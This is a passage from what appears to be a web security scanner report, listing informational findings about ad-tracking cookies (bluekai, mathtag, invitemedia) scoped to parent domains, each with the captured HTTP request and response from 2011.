P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:10:38 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:10:38 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4222959636846101819&fpid=4&nu=n&t=
...[SNIP]...

16.43. http://segment-pixel.invitemedia.com/set_partner_uid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /set_partner_uid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=79&partnerUID=1754bb650623c5be43fca0b57c3910d9&sscs_active=1 HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID=eyIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjg0IjogWyJRNHpndm5Xczk5OXJUU2hCIiwgdHJ1ZV19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 01:56:44 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 01:56:24 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyI4NCI6IFsiUTR6Z3ZuV3M5OTlyVFNoQiIsIHRydWVdLCAiMTk5IjogWyJCREZCRkZDMjMxQTI4MkQ2RTI0NDVCOEU0REU0QTJFMCIsIHRydWVdLCAiNDgiOiBbIjYyMTA5NDcwNDc3ODYzMDAyNjgyODMzODQyNjQ4NTQ3MTIyODcwIiwgdHJ1ZV0sICI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXX0="; Domain=invitemedia.com; expires=Tue, 01-May-2012 01:56:44 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

16.44. http://sync.mathtag.com/sync/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img?mt_exid=1&type=sync&redir=http%3A%2F%2Fads.adbrite.com%2Fadserver%2Fvdi%2F684339%3Fd%3D%5BVISITORDATA%5D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: sync.mathtag.com
Cookie: uuid=4d50384b-4b5e-0f67-919a-7275589c0b85; ts=1304302151

Response

HTTP/1.1 302 Found
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-x4 pid 0x71da 29146
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 02 May 2011 02:09:31 GMT
Location: http://ads.adbrite.com/adserver/vdi/684339?d=uuid%3D4d50384b-4b5e-0f67-919a-7275589c0b85
Etag: 4d50384b-4b5e-0f67-919a-7275589c0b85
Connection: Keep-Alive
Set-Cookie: ts=1304302171; domain=.mathtag.com; path=/; expires=Tue, 01-May-2012 02:09:31 GMT
Content-Length: 0


16.45. http://tags.bluekai.com/site/2831

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2831

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2831?phint=zip=&phint=age=&phint=gender=&phint=segment=000 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/3945?ret=html&phint=__bk_t%3DLogin%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=25552944
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bklc=4dbe0f3c; bk=VO+y8416vaVVIHOf; bkc=KJpn8s5QIwsRAzsD48XFWy1ex0SxgdR/kSI1h+K3jDeC1NViXgA3DwAFAke86rvGdOQVOJIEkTaCrQAMyISPmlyjG4hfv3CXh6Tsae8/wTpwOruFZXF/LO3JUTws7tvYTcB01E9zZ1b9yA2oHrDfB3e0xEu0Kq5PD16crxIjel/4M9X9/L2WXx==; bko=KJynWtHQLmc48XF/R9BAZRJjlgyxaCBe/oEapeYJeSvmQ6sVMTaCXXG5FQG1AAeVZHDf4wAj3GYLA6+t9wDSLp1yf9mpfQeNoiysLPuOgsyKW9L9NjzRV9==; bkst=KJhkMf2ny69DhtXGYeShQbBxcaye2dw5cqMWs3+YvecSD4cYOScxeisJm9FrhUdOHHxUxx5hzcOtXV2yzcap25votwUpw+dlF3IaUoRHVAnkKeuKNm1pfpkrGEKcBkesnOU9quYP1xcwgxQ1JCOGSb00Y7w9qwoNfd0wIHViXIgxM6mgiWA1GY7MDCeOOeYCMtzUmrt8hmRLWuIi0dqYlZrcNoamAFwLzYevUqolvg5sFm37BBPx8GBIAVfl4grwpgNhfCg3CPWShz1WHtP2WmlnGMyOWNja+M1jpqgTUkmPuL3j9Ay6oPJhGWHBFIdzrmLM8vabRW65UFYMSkiJ3y4cwdtZixxxH7YOYz6Jh+MGwYmQeezb00cEf6IBKfF0ffzdGIjiVQ==; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnjjLg9T1jj0UYOcuHZjyAi1dZkhHAR+vt9iCkvsWTyQ1xRyYx7flxEHQj2JOAZaJ7q5QQjjCxj5lLxryx3OicjKsFZ1Mv6mp9yoWkD13u9hPTT/a09vF1uuzq9YK/4AetzespmYwdW91meQqKuTxDp0slgluObZYGjswRi0E9pnWSuIKSOqBG8eTHo9aiV1f6=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:02:13 GMT
Set-Cookie: bklc=4dbe10a5; expires=Wed, 04-May-2011 02:02:13 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 03 May 2011 02:02:13 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=BN6qAw16vaVVIHOf; expires=Sat, 29-Oct-2011 02:02:13 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpM8tjQWJjZjaQ3L1IUARsOQHd/4dSB9RUFjRpvMtaOXew8sHCIwsjA1mU48XLW8SL2xrDgGdsNSCkxIW0P3c0rYkEIi0HDFgxTvCdAcCi4A8KORqGJ/XwZkEF9fQwhfbZQXC6fsPeT/w6ywCrxFtTr/XB3JcTBs7IvYRnw0zU9zs9b9yGdoHZPf2i90Q4H0mq5PAWNcIxIjef/4E9I9aW+E6D=; expires=Sat, 29-Oct-2011 02:02:13 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhkMpNn96WxC3z/YYRhQ3Dxnsyw27BtathiwvwYWKJouLD22C9YuHcrE30a21sdAWRDs6WnLqYy+FWlVBMRtq3UvriDppypX6Ta7ozOki9qeGSMR7CKKTG3XmgHJiEz1R7YODoqsTMD0z9uiGahNZZ7iDeYo82ll724UYWqnh82KfxsUOaWyfCxAAGrAD+p1gdx3/vFtV3oH+VabSl82aUNlXJgMpq92cGU0PaUj7+Ld6h+e6EKiPkL1Wrf7UsX6d8ow7Cl8+NNSn4Ym/pbwHJZhVaTG1qjv5oVwA8tHTB8ic3+p1QDWNyMGRRhoxD03354+ff5g9wDGmQbVfxrhUcKpIUAlFmwKokW/DGgCuuDojxxRAtSDBHVVJmAZJilh2v2V47pt0XbhaI+; expires=Sat, 29-Oct-2011 02:02:13 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 02:02:13 GMT; path=/; domain=.bluekai.com
BK-Server: c53d
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

16.46. http://tags.bluekai.com/site/2893

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2893

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2893?id=3419824627245671268 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/3945?ret=html&phint=__bk_t%3DLogin%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=25552944
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bklc=4dbe0f3c; bk=VO+y8416vaVVIHOf; bkc=KJpn8s5QIwsRAzsD48XFWy1ex0SxgdR/kSI1h+K3jDeC1NViXgA3DwAFAke86rvGdOQVOJIEkTaCrQAMyISPmlyjG4hfv3CXh6Tsae8/wTpwOruFZXF/LO3JUTws7tvYTcB01E9zZ1b9yA2oHrDfB3e0xEu0Kq5PD16crxIjel/4M9X9/L2WXx==; bko=KJynWtHQLmc48XF/R9BAZRJjlgyxaCBe/oEapeYJeSvmQ6sVMTaCXXG5FQG1AAeVZHDf4wAj3GYLA6+t9wDSLp1yf9mpfQeNoiysLPuOgsyKW9L9NjzRV9==; bkst=KJhkMf2ny69DhtXGYeShQbBxcaye2dw5cqMWs3+YvecSD4cYOScxeisJm9FrhUdOHHxUxx5hzcOtXV2yzcap25votwUpw+dlF3IaUoRHVAnkKeuKNm1pfpkrGEKcBkesnOU9quYP1xcwgxQ1JCOGSb00Y7w9qwoNfd0wIHViXIgxM6mgiWA1GY7MDCeOOeYCMtzUmrt8hmRLWuIi0dqYlZrcNoamAFwLzYevUqolvg5sFm37BBPx8GBIAVfl4grwpgNhfCg3CPWShz1WHtP2WmlnGMyOWNja+M1jpqgTUkmPuL3j9Ay6oPJhGWHBFIdzrmLM8vabRW65UFYMSkiJ3y4cwdtZixxxH7YOYz6Jh+MGwYmQeezb00cEf6IBKfF0ffzdGIjiVQ==; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnjjLg9T1jj0UYOcuHZjyAi1dZkhHAR+vt9iCkvsWTyQ1xRyYx7flxEHQj2JOAZaJ7q5QQjjCxj5lLxryx3OicjKsFZ1Mv6mp9yoWkD13u9hPTT/a09vF1uuzq9YK/4AetzespmYwdW91meQqKuTxDp0slgluObZYGjswRi0E9pnWSuIKSOqBG8eTHo9aiV1f6=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:04:03 GMT
Set-Cookie: bklc=4dbe1113; expires=Wed, 04-May-2011 02:04:03 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 03 May 2011 02:04:03 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=gA7hed16vaVVIHOf; expires=Sat, 29-Oct-2011 02:04:03 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpp8VjQI17Y0Y9Lr1IUARsOyH4/B2JCxmccLYeTZ4y1eeXK1pvRXrdpjRn0NHbCXoUHIa3NeYCXoAoDwkzavF2aWio4VC0Pel/wM1dJ0X9ylRuHR4wvcVelQ4MlPae8Mo61vc0x4Ci4ezC4B8KHREDuFySBwXDWyK4ARZ9T1J6OCjduM1olqWekQtCAXtbgGJGwzCX0cIxIsOX98U5nHx==; expires=Sat, 29-Oct-2011 02:04:03 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhkMp2n96WDhnz/YYRhuWGCVBQKfndl5C5LRM0MxQMhBvUic7L/QSx/504VxFgQPf9HhDqxxiyLgslXeORt5gqrUHV6dzl1ZlAPXgh10OJJhbwhJOI4Nj8ba4n36xSJCKm96QPvVhF/hWaQvzw9mmr66Nxia4wwmI2dUpyOMHKwFMN3W3WGGraYvZ9Q99VRTfvCDPN/qJSJUgP1usR6kXQPkTYvz5EBNDvIgwfgrwJG7jMOTeyIfWmb0d5mN5j/j+t/HyqEoBI5H+r572Se2N8ffhgo+11Gf96cBWppQlO4E51E+mNLsr21HrVrK36RDjxnMjxjpoUtR8iK42NbrPD7oWq0FgB8I6/Kjz11jFKK42unJxGHnWiQMYK1DZoBWMwDPkGEJhiq+X4YKfw08dP4OZJMaQ==; expires=Sat, 29-Oct-2011 02:04:03 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 02:04:03 GMT; path=/; domain=.bluekai.com
BK-Server: f349
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

16.47. http://tags.bluekai.com/site/3754

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3754

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3754?phint=ea%3DNA&phint=eb%3DNA&phint=ec%3DNA&phint=ed%3DNA&phint=ee%3DNA&ret=html&id=PARTNER_UUID HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/3945?ret=html&phint=__bk_t%3DLogin%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=25552944
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bklc=4dbe0f3c; bk=VO+y8416vaVVIHOf; bkc=KJpn8s5QIwsRAzsD48XFWy1ex0SxgdR/kSI1h+K3jDeC1NViXgA3DwAFAke86rvGdOQVOJIEkTaCrQAMyISPmlyjG4hfv3CXh6Tsae8/wTpwOruFZXF/LO3JUTws7tvYTcB01E9zZ1b9yA2oHrDfB3e0xEu0Kq5PD16crxIjel/4M9X9/L2WXx==; bko=KJynWtHQLmc48XF/R9BAZRJjlgyxaCBe/oEapeYJeSvmQ6sVMTaCXXG5FQG1AAeVZHDf4wAj3GYLA6+t9wDSLp1yf9mpfQeNoiysLPuOgsyKW9L9NjzRV9==; bkst=KJhkMf2ny69DhtXGYeShQbBxcaye2dw5cqMWs3+YvecSD4cYOScxeisJm9FrhUdOHHxUxx5hzcOtXV2yzcap25votwUpw+dlF3IaUoRHVAnkKeuKNm1pfpkrGEKcBkesnOU9quYP1xcwgxQ1JCOGSb00Y7w9qwoNfd0wIHViXIgxM6mgiWA1GY7MDCeOOeYCMtzUmrt8hmRLWuIi0dqYlZrcNoamAFwLzYevUqolvg5sFm37BBPx8GBIAVfl4grwpgNhfCg3CPWShz1WHtP2WmlnGMyOWNja+M1jpqgTUkmPuL3j9Ay6oPJhGWHBFIdzrmLM8vabRW65UFYMSkiJ3y4cwdtZixxxH7YOYz6Jh+MGwYmQeezb00cEf6IBKfF0ffzdGIjiVQ==; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnjjLg9T1jj0UYOcuHZjyAi1dZkhHAR+vt9iCkvsWTyQ1xRyYx7flxEHQj2JOAZaJ7q5QQjjCxj5lLxryx3OicjKsFZ1Mv6mp9yoWkD13u9hPTT/a09vF1uuzq9YK/4AetzespmYwdW91meQqKuTxDp0slgluObZYGjswRi0E9pnWSuIKSOqBG8eTHo9aiV1f6=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:02:46 GMT
Set-Cookie: bklc=4dbe10c6; expires=Wed, 04-May-2011 02:02:46 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=cZ6ypw16vaVVIHOf; expires=Sat, 29-Oct-2011 02:02:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhqhz49GntsAKsRye84HQRsCkP9dCzVPcT1Yymz7X7wyweM1umev4XIU0RGUI6HvkXjMS2P0TeYjboW8UBPGwJ4Jvc0ozPHIuelywizF9y1666RsESFl9atcTCdEyVPf2MJQ1/cbR4htReX5U1jsPRMXVFxIaB1WchmnQSs921jDwQopSCXhyjDwGCsBrItY3g8/wzCX6crQdWOi8PmX9==; expires=Sat, 29-Oct-2011 02:02:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhkMg2ny69RCZXGYnSNQ3Bxcaye2dmfmlYJqSyPRZlE5gHT/DW/+WBJ/LbYKda4zOcaH5OOmMC65FaFzcOhzdUu35eNIjfld5TuK+2WS9mkTtxX0zKUkEKdCeTLtAzCibQ9cMkusKwymOvmyxxzcjk/HxopysptdVE2p2DvDj+q2sFHeZ/u9tMvrOHW19a1bwwkCNo8JUsyEwMgbvSXN7+76HfulK8PtmI/2JitnIHCygBVx91BS5hoERBZTbdIR+NfbIbiCrLa7MdLRidBK2bJ7vRM1sTteRXZ0UJn+PJ1ojJ0oQ9EESkDcYCHL82cKb8UWS3QFOmjlnlZQt0Ri5+70fI3hH/J//pQ9C1SWT0h6Ua/xOkr5OCe3OKFC4ryPUuzrqlI35zqexq+8ZJffFXeiGhMM9==; expires=Sat, 29-Oct-2011 02:02:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 02:02:46 GMT; path=/; domain=.bluekai.com
BK-Server: 3550
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

16.48. http://tags.bluekai.com/site/3945

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3945

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3945?ret=html&phint=__bk_t%3DWelcome%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=22181052 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bkst=KJy5MgNvhW9DCVIh/sCuVx3nCVNQ4rd1kcsBbyGChmiViC1ZY/aLWjv/ntYdI9ot0MSYakRVFGcwRsaMjIFL+r5X4mK1Tc6qR9rboZTVxl1EFvDMIweH9jEz1R7YHDoqsT7v0zQuioahNZZ7iDeYk2dw7FdNdY8yHH9BT6JJvgkWnLlkHFKy9f9wJL2F0dB15i5L536mS2awYNRRfvoLtCjcAfdhitz4wqLcApQoA7uKAbxqpoJENUjUSmmInRXU2DRjOr+aooMQsQANMYA+Aas2dc702EQWYse/7OlimlcHpl+8Fdn8PfCIGCYkkD/u0iovYnsZvik3vbyov0pB8IL3dx5GsWZQ; bk=e1mPh2iZ/VKVIHOf; bkc=KJpM8sPQZsfY0nO88x84HQRsOATQd8Tvv+IhAysacXmYTn1OIKFZ1MvLHrnUGws7ZYeT7ay1e9KZ1beyD8oHIRTB3cyxMVpKqHPDX6crxISel94M9yODsYNN; bko=KJ0E8VBQtnh0CbXYQ0ux5Vqaek2ICiGQbIuucqb1e1qLe9pfyvyfF9y1vR+OnsXTuhU/0rROLHvOg9yySh/qC1U1999p5HUd; bkw5=KJpE+Z/9QCvsW6YuWzxWAo0X666Rs4uHjJCxjsfq/VuRDVEzfDcLW3QRCsEMgj7n0999mnyv5x==

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 01:58:50 GMT
Set-Cookie: bklc=4dbe0fda; expires=Wed, 04-May-2011 01:58:50 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=chBAO2thl+ZVIHOf; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpn8s5QIwsRAKWVdp84HQRsCAyQUI6HvkXjMS2P0TeYjboW8UBPGwJ4Jvc0ozPHIEWLYeT7nywe5OBsCL6g5Xe82NHxIRb5eYCXAcTR7yl/UpKUAVWNWgXsMEdaO1c78sJQmeY59RV46Gpv5th98RBGjwBr3bYSel/41CdAwCQ491l+ugD=; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJynWtHQr1Vdp8KHxjSwQVcp0CtIYQ0uxBSjaE+XIHZ3Qv0EulR9jRljsHMtQPklKOARDCSeVBbXWnN1evo9PMRwuYyHvLq11/AByZJk999zIhAI; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5MfNvhW9DCVIh/sCVY6+CLq9BpmI5ZEvrzPPRkCM5D7cYOYsyVTxATQFRnfbYMuQtQCjiRVa+RI1nVBMRtEgjuZ0dXlcmFHNTVQHRQsouEvqB8eHTccqQhS1B0nCMWGDnkqRtanZEGuDDxImL66TEQREwwZI2ddSlTZwktSBFMNSOvTJGsO5vDLAkzZZm8QrUuyegRJnAneLR0V3cfjbGpDnDQ8ukO3+XBYMEg48wf2bfP285QlTDoday7JYTSFqMwPPVhtiMrL0toXVXLCr6i6yhyEDuSCCEViYMKFjNTIBKa0Y9jrHLW8tnyloz0TLfp2IffuDvDPGoJvWLoTxxSdv1GgqYZipcpnyI+mfNXgXd4yc+WaPx; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
